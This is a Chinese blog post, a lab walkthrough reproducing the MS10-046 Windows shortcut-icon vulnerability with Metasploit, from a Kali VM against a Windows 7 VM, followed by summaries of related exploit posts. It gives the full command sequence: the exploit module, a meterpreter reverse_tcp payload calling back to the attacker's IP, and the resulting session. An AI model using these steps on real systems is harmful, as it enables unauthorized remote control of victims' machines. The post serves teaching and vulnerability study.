漏洞复现---MS10-046漏洞

最新推荐文章于 2024-02-20 14:54:14 发布
最新推荐文章于 2024-02-20 14:54:14 发布
阅读量5.3k 收藏 40
点赞数 8
分类专栏: 漏洞复现 文章标签: 网络安全 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liu914589417/article/details/124444931
版权

漏洞复现—MS10-046漏洞
实验工具
1、VMware虚拟机
2、Windows7系统虚拟机
3、Kali 2021 系统虚拟机

1、在VMware中打开Windows7虚拟机和Kali 2021虚拟机,并确保两台机器处于同一网段,能互相ping通。
在这里插入图片描述
2、确定IP 地址和网络连接正常后,Kali 2021中输入命令【msfconsole】进入MSF攻击框架。
在这里插入图片描述
3、进入MSF攻击框架后,搜索MS10-046漏洞,输入命令【search ms10_046】,回车执行命令,搜索到下列漏洞。
在这里插入图片描述
4、引用编号为【0】的漏洞,输入命令进行引用,输入完毕回车执行【use exploit/windows/browser/ms10_046_shortcut_icon_dllloader】。
在这里插入图片描述
5、进入以后,输入命令【show options】查看漏洞可配置的内容,根据需要,将【srvhost】配置成Kali的IP地址,输入命令【set srvhost IP地址】进行配置,回车执行。
在这里插入图片描述
6、最后一步配置攻击载荷payload,设置payload,命令如下【set payload windows/meterpreter/reverse_tcp】,payload的IP地址设置为Kali的IP地址,命令如下【set lhost IP地址】,输入完毕回车执行。
在这里插入图片描述
7、漏洞环境配置完毕,输入【run】进行运行。
在这里插入图片描述
8、可以看到生成了一个【URL地址】,将URL地址进行复制,到Windows 7虚拟机中的【浏览器】进行打开,观察效果。
在这里插入图片描述
9、Windows 7 虚拟机中弹出了一个文件夹,其中有一个【.dll文件】和一个【快捷方式】,【双击】快捷方式后,回到Kali 2021虚拟机观察效果。
在这里插入图片描述
10、Kali 2021虚拟机中显示获得一台机器的控制权,接下来输入命令【sessions 1】进入到Windows 7系统的【meterpreter】控制界面,漏洞复现成功。
在这里插入图片描述
博客园地址:https://www.cnblogs.com/redHskb/
知乎地址:https://www.zhihu.com/people/yi-kuai-xiao-bing-gan-43-64/posts
欢迎关注评论,耶斯莫拉

Hskb
关注
  • 8
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 12
    评论
专栏目录
渗透测试基础(六) MS10-046漏洞攻击
Venus_majian
06-24 111
MS10-046
MS10-046漏洞复现
weifengbbt的博客
11-08 1892
MS10-046漏洞复现0x00 前言0x01 环境0x02 过程0x03 结语0x04 建议 0x00 前言 这是我对msf里漏洞利用的学习记录 0x01 环境 1. 目标机环境 Windows xp sp3 IE7浏览器 2. 攻击机环境 kali 3. 拓扑结构 0x02 过程 1. 检查网络联通 ping 192.168.37.129 2. 启动Metasploit msfconsol...
【无标题】ms10_046复现
m0_73853543的博客
07-01 112
操作系统攻击:早期WindowsMS10-046漏洞
shelter1234567的博客
07-29 1164
本次介绍早期的windows高危漏洞——MS10_046_SHORTCUT_ICON_DLLLOADER ,该漏洞可以通过浏览器跳转网络资源的方式利用,结合xss攻击用户的系统 危险性极高。
Metasploitable渗透测试实战:ms10-046
m0_60121089的博客
05-06 1483
1.漏洞描述 这是Windows Shell中一个公开披露的漏洞。如果显示特制快捷方式的图标,则该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。 2.实战工具 软件:VMware Workstation 14 攻击机:kali(ip:192.168.240.143) 靶机:win7(ip:192.168.240.157) 3.漏洞利用 1.用ping命.
MS10-046文件快捷方式漏洞复现与利用
sGanYu
11-07 4933
攻击机:kali 靶机:windows xp sp2 使用metasploit框架,需要启用metasploit所依赖的postgresql数据库 在kali上启动postgresql命令【systemctl start postgresql】 如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开 启动msfconsole 搜索ms10-046相应的模块 这里有两个可利用的模块,browser.
MS10-046漏洞复现配合DNS欺骗
qq_43655183的博客
09-07 710
利用ms10_046漏洞生成攻击URL: 使用漏洞攻击模块 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 设置payload set payload windows/meterpreter/reverse_tcp 设置攻击参数 set SRVHOST 攻击机IP set LHOST 攻击机IP 开始渗透 run ...
MS10-046漏洞测试
aozhuo4755的博客
11-09 719
这次用到MS10-046这个远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 命令: 1. msfconsole //启动MSFMetasploit 2. search ms10-046 //搜索漏洞 3. use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模...
MS10-046漏洞利用
journeyIT的博客
01-10 345
MS10-046远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 命令: 1. msfconsole //启动MSFMetasploit 2. search ms10-046 //搜索漏洞 3. use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模块 4. set payloa...
微软MS10-046漏洞的利用
qq_50854662的博客
05-26 825
微软MS10-046漏洞的利用 0x00 前言0x01 环境1. 目标机环境2. 攻击机环境3. 拓扑结构 0x02 过程1. 相互ping通2. 启动Metasploit3. 查找和MS10-046相关的模块4. 加载模块5. 设置所使用的payload6. 设置文件共享服务器的地址,应为BackTrack虚拟机的地址7. 设置目标主机被控制后反弹的地址,应为BackTrack虚拟机的地址8. exploit9. 查看会话10. 进入交互模式11. 拿到shell 0x00 前言 这是我
MS14-068漏洞复现
2ed
11-18 1377
背景 微软今天(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft WindowsKerberosKDC漏洞(CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
漏洞复现-Exchange系列
aming小老弟
02-20 440
Exchage就是我们常说的邮箱服务器。Exchange是由微软推出的用于企业环境中部署的邮件服务器。微软对外发布的第一个Exchange版本是Exchange 4.0,最开始Exchange使用X.400目录服务,随后转向使用微软的活动目录,最开始的时候微软还提供了Microsoft Exchange Client,即Exchange邮件客户端,随后被Outlook取代。
漏洞复现-永恒之蓝(MS17-010)
qq_60848021的博客
09-19 3031
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
ms10-046漏洞利用+bypassuac提权
m0_62008601的博客
11-24 1109
记一次ms10-046漏洞复现过程+bypassuac提权过程
MS10-046_LNK文件快捷方式漏洞的原理分析(多图杀猫)
热门推荐
GaA.Ra的自留地 in Csdn
06-10 1万+
文件快捷方式漏洞MS10-046是除了n年前的动画光标(.ani)漏洞之外另一个让我觉得比较有趣的漏洞,毕竟是本机执行任意代码的权限,当然,n年前我还只是一个菜鸟,神马都不懂.       入正题吧,欢迎拍砖,大家一起进步.(后面我会把一些参考文章贴出来的)       由于MS10-046漏洞是在shell32.dll当中,windows出于美化的目的,会现实快捷方式的图标,这个图标可
Metasploit的攻击实例讲解----ms10_046快捷方式图标漏洞
weixin_33907511的博客
05-19 839
    不多说,直接上干货!   准备工具 1、Kali linux 2016.2(Rolling)系统  IP:  192.168.1.103 2、受害者机子(windows XP系统)   IP:  10.10.10.1.102 3、使用工具 msfconsole       步骤: 1、进入控制台   root@kali:~# msfconsole ...
利用MS10-046漏洞攻击win7操作系统
afei001
03-27 2645
MS10-046简介     MS10-046是一个文件快捷方式漏洞,能利用这个漏洞提权直接获取到shell。 利用MS10-064攻击win7获取shell 实验环境: 攻击机:kali 靶机:win7-x86_64 1.开启kali和win7 2.kali中启动MSF找到MS10-046模块 root@kali:~# msfconsole #启动MSF ...
ms08-067漏洞复现
最新发布
07-04
MS08-067是一个著名的Windows系统安全漏洞,也称为"远程代码执行漏洞(Remote Code Execution)",主要影响的是Microsoft Windows Server 2003 SP2及以后版本、Windows XP SP3以及Windows Vista和Windows Server 2008。这个漏洞存在于Windows系统中的"Server Message Block (SMB)"服务中的一个文件共享功能。 复现MS08-067漏洞通常涉及以下几个步骤: 1. **环境准备**:你需要一个受影响的Windows系统作为目标,或者能够访问到这样的系统。如果是在本地测试,可能需要安装旧版Windows并开启SMB服务。 2. **利用工具**:网络上存在一些已知的漏洞利用工具,如Metasploit或Powersploit模块,这些工具可以帮助自动化漏洞检测和攻击过程。 3. **发送恶意请求**:通常使用像"NetBIOS名称解析请求"或"SMB读写请求"的形式,将包含恶意代码的数据包发送给目标机器。这可以通过命令行工具如nc(netcat)、powershell或专门的渗透测试框架完成。 4. **执行代码**:当目标系统解析恶意请求并尝试处理时,如果权限允许,会执行其中的恶意脚本,从而导致远程代码执行。
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hskb

谢谢哥谢谢哥

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值